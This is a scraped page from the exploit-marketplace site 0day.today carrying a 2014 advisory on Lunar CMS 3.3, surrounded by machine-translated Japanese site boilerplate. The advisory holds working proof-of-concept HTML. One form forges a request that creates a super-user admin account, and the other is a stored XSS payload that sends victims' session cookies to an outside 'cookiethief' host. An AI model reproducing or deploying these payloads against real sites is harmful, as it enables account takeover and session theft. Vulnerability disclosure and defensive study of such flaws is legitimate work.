0day.today - 最大、世界でのデータベースを利用します。

言語を選択してください:

あなたは0day.today について知っておくべきこと：

私たちは一つのメインのドメインを使用します。http://0day.today
材料のほとんどは完全に無料
あなたがしたい場合はエクスプロイトを購入 / V.I.P.を取得アクセスまたは任意の他のサービスのために支払います、
あなたが購入したり、獲得する必要があります金

We accept currencies: [contact admin to find more]

私たちはあなたの目的をハッキングするためのツールとして、私たちのサイトを利用したいので、行動のあらゆる種類のことでしていませんあなたがアクセスする権限がありませんillegaly他のユーザーやウェブサイト禁止されますに影響を与えますあなたのデータを含め、あなたのアカウントが破棄されます。
ログインこのサイトの管理者が使用しています公式の連絡先.詐欺師にご注意！

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

私は0day.todayのユーザーを登録しています。私は将来的に、この画面を表示したくありません。

最初の何をしますか？

読みます [ 契約 ]
読みます [ 送信 ] ルール
訪問します [ よくある質問 ] ページ
[ 登録 ] プロファイル
GET [ 金 ]
あなたがしたい場合は [ 売り ]
あなたがしたい場合は [ 買い ]
あなたが失われた場合は [ アカウント ]
ご質問 [ [email protected] ]

メインリンク

次の方法でご連絡することができます

Mail:

[email protected]

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ 承認 ] [ 登録 ] [ アカウントの復元 ]

次の方法でご連絡することができます:

Mail:

[email protected]

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Lunar CMS 3.3 - CSRF And Stored XSS Vulnerability

著者

LiquidWorm

リスク

[

セキュリティリスクハイに

]

0day-ID

カテゴリ

日付の追加

プラットフォーム

<!--
 
Lunar CMS 3.3 CSRF And Stored XSS Vulnerability
 
 
Vendor: Lunar CMS
Product web page: http://www.lunarcms.com
Affected version: 3.3
 
Summary: Lunar CMS is a freely distributable open sourcecontent
management system written for use on servers running the ever so
popular PHP5 & MySQL.
 
Desc: Lunar CMS suffers from a cross-site request forgery and a
stored xss vulnerabilities. The application allows users to perform
certain actions via HTTP requests without performing any validity
checks to verify the requests. This can be exploited to perform
certain actions with administrative privileges if a logged-in user
visits a malicious web site. Input passed to the 'subject' and 'email'
POST parameters thru the 'Contact Form' extension/module is not properly
sanitised before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in
context of an affected site.
 
Tested on: Apache/2.4.7 (Win32)
           PHP/5.5.6
           MySQL 5.6.14
 
 
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience
 
 
Advisory ID: ZSL-2014-5188
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5188.php
 
 
11.06.2014
 
-->
 
 
 
CSRF Add Admin
===============
 
<html>
  <body>
    <form action="http://localhost/lunarcms/admin/user_create.php" method="POST">
      <input type="hidden" name="name" value="Hacker" />
      <input type="hidden" name="email" value="[email protected]" />
      <input type="hidden" name="password1" value="251ftw" />
      <input type="hidden" name="password2" value="251ftw" />
      <input type="hidden" name="access" value="0" />
      <input type="hidden" name="Submit" value="submit" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>
 
Access levels:
 
0: Super user
1: Admin
2: Website only
 
 
 
CSRF Stored XSS (Session Hijack)
=================================
 
<html>
  <body>
    <form action="http://localhost/lunarcms/admin/extensions.php?ext=contact_form&top" method="POST">
      <input type="hidden" name="email" value='"><script>alert(1);</script>' />
      <input type="hidden" name="error" value="2" />
      <input type="hidden" name="sent" value="1" />
      <input type="hidden" name="subject" value='"><script>var x = new Image();x.src='http://www.example.com/cookiethief.php?cookie='+document.cookie;</script>' />
      <input type="hidden" name="submit" value="submit" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

#  0day.today [2024-06-30]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Lunar CMS 3.3 - CSRF And Stored XSS Vulnerability

エラー報告

エラー報告